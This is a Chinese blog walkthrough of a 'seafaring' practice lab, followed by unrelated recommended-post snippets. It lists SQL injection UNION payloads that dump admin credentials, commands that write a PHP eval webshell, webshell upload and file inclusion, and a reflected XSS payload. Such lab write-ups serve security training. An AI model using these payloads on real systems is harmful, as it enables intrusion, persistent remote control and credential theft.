seafaring靶场漏洞测试攻略

已于 2024-09-13 14:52:32 修改
阅读量252 收藏 4
点赞数 4
文章标签: sql 数据库 命令执行漏洞 文件上传漏洞 文件包含漏洞 xss漏洞
于 2024-09-13 14:47:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shw_yzh/article/details/142207193
版权

打开网页

一.sql注入漏洞

1.输入框测试回显点

-1 union select 1,2,3#

2.查看数据库名

-1 union select 1,2,database()#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin表中列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看admin的账号和密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

账号为admin,密码为mysql

二:命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问69.php

echo '<?php @eval($_POST['cmd']);?>' > 69.php

4.蚁剑连接

三:文件上传漏洞

1.使用 账号为admin,密码为mysql 登录网站后台,下方有一个上传文件的地方

2.上传php文件成功,尝试写入一句话木马到wff.php中上传

3.访问上传成功给的路径

4.蚁剑连接

四:文件包含漏洞

1.页面关于存在文件包含

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.包含之前的69.php一句话木马,访问

4.蚁剑连接

五:反射型xss漏洞

1.登陆界面输入错误会回显在页面上

2.输入<script>alert(1)</script>,页面弹1

2407-2 shw
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
测试集(2)-words
马如林的IT博客
11-26 5万+
 aa.ma.mabandonabandonabattoirabilityabilityableableabnormalabnormalaboardaboardaboutaboutaboveaboveabracadabraabroadabroadabsenceabsenceabsentabsent
【CTF解题】BCTF2018-houseofatum-Writeup题解
HBohan的博客
10-14 416
先把ld和Libc给换成题目给的 patchelf --set-interpreter ./glibc-all-in-one/libs/2.26-0ubuntu2_amd64/ld-2.26.so --replace-needed ./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6 ./glibc-all-in-one/libs/2.26- 0ubuntu2_amd64/libc-2.26.so houseofAtum 程序分析 这里只进行一些.
求助 MOR-Tales of seafaring
fsjcondingle的博客
02-09 371
题目大意: 小科经常会听爷爷给他讲述年轻时航海的故事,从一个港口开始航行,经过许多水路,最后到达了另一个港口,每次都能最高效地完成航行。 听多了,小科就开始怀疑爷爷是在吹牛,于是他打算写一个程序,验证爷爷谷故事中的航行能不能完成 故事场景中,有n个港口,m条水路、每条水路连接着2个港口,每个航行故事中会询问两个港口间是否有长度为d的路径(不一定是简单路径),即可以重复走一条边。 输入格式 第一行有三个整数n、m和k(2<=n<=5000, 1<=m<=5000, 1&l
bzoj3137: [Baltic2013]tracks
weixin_30454481的博客
02-23 60
炸一看好像很神仙的样子,其实就是个sb题 万年不见的1A 但是我们可以反过来想,先选一个起点到终点的联通块,然后这联通块后面相当于就能够走了,继续找联通块 然后就能发现直接相邻的脚步相同的边权为0,否则边权为1 直接bfs找最深的层就完事了 #include<cstdio> #include<iostream> #include<cstring>...
[POI2013]MOR-Tales of seafaring
weixin_30586257的博客
07-10 78
题目 思博题,发现一旦路径太长我们可以来回走最后一条边,但是这样并不能改变路径长度的奇偶性 所以求一下所有点之间奇最短路和偶最短路就好了,直接暴力\(BFS\)即可 有一个烦人的特判 代码 #include<bits/stdc++.h> #define mp std::make_pair #define re register inline int read() { ...
[POI2013] MOR-Tales of seafaring
acteu20420的专栏
09-15 159
传送门 简单题意:给n个点m条边无向图,每次询问两个点之间是否有长度为d的路径(不一定是简单路径)。即可以重复走一条边。 思路: 蛮水的叭。我们知道路径可以重复走,所以只要找到一条和d奇偶性相同的最短路,就可以做到了。 因为可以在一条边上不停来来回回,也就是在最短路上加上了一个偶数-->偶数大小任意!!!; 此处应有代码: 1 #include<bi...
BZOJ3417: Poi2013 Tales of seafaring
commonc的博客
05-31 979
题目大意:给n个点m条边无向图,每次询问两个点之间是否有长度为d的路径(不一定是简单路径)   从a到b假如有长度为x的路径,那就可以往回走一步再往前走一步得到长度为x+2的路径 所以可以求出每对点之间的奇数长度最短路和偶数长度最短路,然后判断是否小于d即可 PS: 1.这题卡内存,所以必须离线之后一个点一个点的枚举起点算完之后重新利用内存 2.会有单点不与外界联通并查询这个单点自己之
中国海洋大学2022CTF校赛
web13618542420的博客
05-15 302
中国海洋大学2022校赛 质量总的来说还不错,类似于新生赛,偏简单,不过有些题还是很有趣的. http://github.com/tangzichengcc/The_Growth_Path_Of_A_CTFer_And_Pwner 题目的附件放在了我的github项目,有兴趣的朋友可以去做一下 被和谐了好像,在这个项目里 The_Growth_Path_Of_A_CTFer_And_Pwner 文章目录 中国海洋大学2022校赛 web very old php game 你比香农都牛逼 Baby
A Brief History of Humankind — 01 the cognitive revolution
qq_42347617的博客
05-17 2643
1. The Cognitive Revolution 1.1 An Animal of No Significance Word List: Word Interpretation Domain n.域 Kingdom n.界 Phylum n.门 Class n.纲 Order n.目 Family n.科 genus n.“属” 名 speci...
在 Red Hat 上安装 SQL Server 2022 并创建数据库
最新发布
2301_76664379的博客
09-12 936
本快速入门介绍如何在 Red Hat Enterprise Linux (RHEL) 8.x 或 9.x 上安装 SQL Server 2022 (16.x)。然后可以使用 sqlcmd 进行连接,创建第一个数据库并运行查询。注意:本教程需要用户输入和 Internet 连接。必须拥有 RHEL 8.x 计算机(内存至少为 2 GB)。如果以前安装了 SQL Server 的社区技术预览版 (CTP) 或候选发布 (RC) 版本,则必须先删除旧存储库,然后再执行这些步骤。
被低估的SQL
weixin_61431494的博客
09-03 1710
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
深入解析Flink SQL:基本概念与高级应用
GZM888888的博客
09-09 445
Flink SQL作为Flink的重要组成部分,提供了一种声明式的语法,使得开发者能够更加便捷地处理无界和有界数据流。未来,随着Flink生态的不断完善,Flink SQL将在更多场景下发挥其优势,成为大数据处理的核心技术之一。Flink SQL是基于Apache Flink的分布式数据处理引擎,它扩展了传统的SQL语义,以支持流式数据处理和批处理。与传统的关系型数据库中的SQL不同,Flink SQL设计用于处理高速、连续的数据流,并且支持事件时间处理和乱序数据的处理。二、Flink SQL的核心特性。
小记XML写sql的聚合函数用法
2301_76162638的博客
09-09 306
手动查出需要用于查询、展示的字段用法:(需要GROUP BY) 将每个岗位下的姓名合并为一个以逗号分隔的字符串的结果有长度限制,默认情况下是 1024 个字符,可以通过调整系统变量来增加这个限制。
SQLServer分组查询
NaZiMeKiY的博客
09-08 467
例如我们再在日期后加入一个总人数在3人及以上的限制,那么就会用到聚合函数count(),但是where中是不能使用聚合函数作为限制条件的,所以我们需要用到having关键字。注意点:在分组查询中除了使用聚合函数的数据和使用group by和select后面的分组之外,数据都无法作为一列显示。可以不断使用union链接,但是相对应的是代码实在太过繁琐,所以我们还是使用group by的方式进行分组。五.在使用分组查询时添加多个限制条件,并且使用到聚合函数。例如我们加上一个出生日期的限制,只统计00后的数据。
以下是一些 SQL 优化的方法:
qq_20033739的博客
09-09 457
例如,避免“WHERE DATE(column_name) = '2024-09-09'”,而应该使用“WHERE column_name >= '2024-09-09' AND column_name < '2024-09-10'”。- 例如,如果在表 A 的“column_a”列和表 B 的“column_b”列上进行连接,应该在这两个列上创建索引。- 索引可以大大提高查询的速度,但过多的索引也会影响数据的插入、更新和删除操作,因此需要权衡。- 根据实际需求选择合适的连接方式,避免不必要的全连接。
RocketMQ出现The broker does not support consumer to filter message by SQL92
山不见我,我自见山
09-12 152
然后通过rocketmq-console来查看,集群中的这个属性是否为true,为true就可以了。在使用RocketMQ使用SQL过滤消息的时候,出现下面错误。原因是我们的配置文件没有开启SQL过滤功能,我们需要在。接着我们重启namesrv与broker服务就解决问题。配置文件中添加下面命令
TinyWebSever源码逐行注释(六)_ sql_connection.cpp
qq_39969848的博客
09-09 358
Linux下C++轻量级Web服务器,助力初学者快速实践网络编程,搭建属于自己的服务器.sql_connection.cpp用于实现数据库的连接池。
RB-SQL:利用检索LLM框架处理大型数据库和复杂多表查询的NL2SQL
AwaysLine
09-10 588
利用密集型段落检索(Dense Passage Retrieval, DPR)模型来检索相关表格、列和示例,以构建有效的提示工程。此外,框架还引入了SQL骨架作为示例组织中的中间步骤,以指导正确的SQL生成过程。表格检索器从数据库中筛选表格,列检索器进一步筛选列。SQL框架检索器用于选择相似的少量示例,并将SQL框架添加到示例组织中。:搜索具有相似SQL骨架的少量示例,并将SQL骨架引入示例组织,以增强上下文学习过程。该模块计算问题与表格之间的相似度,并检索与问题高度相关的表格。(b) 列检索器的框架。
sql格式化工具
qq_25194681的博客
09-09 247
2. 格式化后用@拼接。
LeetCode_sql_day21(1440.计算布尔表达式的值)
Darling博客
09-09 982
如上所示, 你需要通过使用 Variables 表来找到 Expressions 表中的每一个布尔表达式的值.在 SQL 中,(left_operand, operator, right_operand) 是该表主键.left_operand 和 right_operand 的值保证存在于 Variables 表单中.① 一开始走了一些弯路 将两个值连接后 用concat 连接 判断值 后来发现都是true。operator 是枚举类型, 取值于('', '=')结果格式如下例所示。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值